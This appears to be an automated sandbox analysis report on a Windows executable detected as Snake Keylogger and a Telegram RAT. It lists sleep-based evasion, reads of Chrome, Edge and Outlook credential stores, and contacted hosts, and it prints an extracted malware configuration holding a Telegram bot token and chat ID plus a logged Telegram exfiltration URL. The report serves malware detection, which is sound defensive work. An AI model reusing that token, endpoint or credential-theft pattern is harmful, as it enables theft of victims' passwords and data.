Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -595117s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -595000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -594891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -594766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -594657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -594532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -594407s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -594297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -594188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -594063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -593938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -593813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -593688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -593578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -593469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604	Thread sleep time: -593344s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 0_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405974
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 0_2_004064C6 FindFirstFileW,FindClose,	0_2_004064C6
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405974
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_004064C6 FindFirstFileW,FindClose,	4_2_004064C6
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_004027FB FindFirstFileW,	4_2_004027FB

Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599782	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 598913	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 598229	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597191	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596688	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596579	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596454	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596329	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596204	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 595824	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 595477	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 595355	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 595247	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 595117	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594891	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594766	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594657	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594532	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594407	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594297	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594188	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 594063	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 593938	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 593813	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 593688	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 593578	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 593469	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Thread delayed: delay time: 593344	Jump to behavior

Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local\Microsoft	Jump to behavior

Source: JOSXXL1.exe, 00000004.00000002.2943116609.000000000701D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: JOSXXL1.exe, 00000004.00000002.2943116609.0000000006FC7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWxA

Source: C:\Users\user\Desktop\JOSXXL1.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\JOSXXL1.exe	API call chain: ExitProcess graph end node

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\JOSXXL1.exe

Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_10001B18

Enables debug privileges

Source: C:\Users\user\Desktop\JOSXXL1.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\JOSXXL1.exe

Memory allocated: page read and write | page guard

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\JOSXXL1.exe

Process created: C:\Users\user\Desktop\JOSXXL1.exe "C:\Users\user\Desktop\JOSXXL1.exe"

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\JOSXXL1.exe	Queries volume information: C:\Users\user\Desktop\JOSXXL1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\JOSXXL1.exe

Code function: 0_2_004061A5 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_004061A5

Source: C:\Users\user\Desktop\JOSXXL1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.2971397294.0000000037451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: JOSXXL1.exe PID: 3492, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000004.00000002.2971397294.0000000037555000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JOSXXL1.exe PID: 3492, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.2971397294.0000000037451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: JOSXXL1.exe PID: 3492, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
142.250.181.225	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
142.250.185.238	drive.google.com	United States	15169	GOOGLEUS	false

Contacted Domains

Name	IP	Active
drive.google.com	142.250.185.238	true
drive.usercontent.google.com	142.250.181.225	true
reallyfreegeoip.org	188.114.96.3	true
api.telegram.org	149.154.167.220	true
checkip.dyndns.com	193.122.130.0	true
checkip.dyndns.org	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:447849%0D%0ADate%20and%20Time:%2027/10/2024%20/%2006:11:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20447849%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown
https://reallyfreegeoip.org/xml/173.254.250.68	false		unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown

AV Detection

Found malware configuration

Source: 00000004.00000002.2971397294.0000000037451000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7511877228:AAEfdtsXiYLhmN4YbL4GOCHPaqlvykB-alc", "Chat_id": "7534008929", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: JOSXXL1.exe

ReversingLabs: Detection: 57%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D787A8 CryptUnprotectData,		4_2_39D787A8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D78EF1 CryptUnprotectData,		4_2_39D78EF1

Uses 32bit PE files

Source: JOSXXL1.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:61896 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.4:61847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.4:61854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:61981 version: TLS 1.2

Source: JOSXXL1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 0_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405974
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 0_2_004064C6 FindFirstFileW,FindClose,	0_2_004064C6
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405974
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_004064C6 FindFirstFileW,FindClose,	4_2_004064C6
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_004027FB FindFirstFileW,	4_2_004027FB

Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local\Microsoft	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 0015F45Dh	4_2_0015F2C0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 0015F45Dh	4_2_0015F4AC
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 0015F45Dh	4_2_0015F52F
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 0015FC19h	4_2_0015F961
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39692C19h	4_2_39692968
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 396931E0h	4_2_39692DC8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3969D7F9h	4_2_3969D550
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 396931E0h	4_2_3969310E
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 396931E0h	4_2_39692DC2
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3969DC51h	4_2_3969D9A8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_39690040
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3969FAB9h	4_2_3969F810
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3969D3A1h	4_2_3969D0F8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3969CF49h	4_2_3969CCA0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3969F209h	4_2_3969EF60
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39690D0Dh	4_2_39690B30
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39691697h	4_2_39690B30
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3969EDB1h	4_2_3969EB08
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3969F661h	4_2_3969F3B8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3969E501h	4_2_3969E258
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3969E0A9h	4_2_3969DE00
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3969E959h	4_2_3969E6B0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D79280h	4_2_39D78FB0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D77EB5h	4_2_39D77B78
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D762D9h	4_2_39D76030
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7ECA6h	4_2_39D7E9D8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D75E81h	4_2_39D75BD8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D718A1h	4_2_39D715F8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7CCB6h	4_2_39D7C9E8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7DA66h	4_2_39D7D798
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D75A29h	4_2_39D75780
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7FA56h	4_2_39D7F788
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D72E59h	4_2_39D72BB0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D71449h	4_2_39D711A0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7BA76h	4_2_39D7B7A8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7C826h	4_2_39D7C558
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D72A01h	4_2_39D72758
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D70FF1h	4_2_39D70D48
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7E816h	4_2_39D7E548
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7B5E6h	4_2_39D7B318
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D725A9h	4_2_39D72300
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7D5D6h	4_2_39D7D308
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D779C9h	4_2_39D77720
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D755D1h	4_2_39D75328
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D75179h	4_2_39D74ED0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7C396h	4_2_39D7C0C8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D77571h	4_2_39D772C8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D70B99h	4_2_39D708F0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7F5C6h	4_2_39D7F2F8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D70741h	4_2_39D70498
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then mov esp, ebp	4_2_39D7B081
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D76733h	4_2_39D76488
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7E386h	4_2_39D7E0B8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D72151h	4_2_39D71EA8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D71CF9h	4_2_39D71A50
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D702E9h	4_2_39D70040
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D77119h	4_2_39D76E70
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D74D21h	4_2_39D74A78
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7D146h	4_2_39D7CE78
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D73709h	4_2_39D73460
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7F136h	4_2_39D7EE68
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D76CC1h	4_2_39D76A18
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D732B1h	4_2_39D73008
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7BF06h	4_2_39D7BC38
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D748C9h	4_2_39D74620
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7DEF6h	4_2_39D7DC28
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C6970h	4_2_3A7C6678
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C5986h	4_2_3A7C56B8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C4746h	4_2_3A7C4478
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CD768h	4_2_3A7CD470
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CAC60h	4_2_3A7CA968
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C0C2Eh	4_2_3A7C0960
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C8158h	4_2_3A7C7E60
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C3E26h	4_2_3A7C3B58
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CEF50h	4_2_3A7CEC58
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CC448h	4_2_3A7CC150
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C5E16h	4_2_3A7C5B48
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C9940h	4_2_3A7C9648
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C030Eh	4_2_3A7C0040
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C6E38h	4_2_3A7C6B40
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C3506h	4_2_3A7C3238
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CDC30h	4_2_3A7CD938
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CB128h	4_2_3A7CAE30
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C54F6h	4_2_3A7C5228
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C8620h	4_2_3A7C8328
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CF418h	4_2_3A7CF120
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C2BE6h	4_2_3A7C2918
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CC910h	4_2_3A7CC618
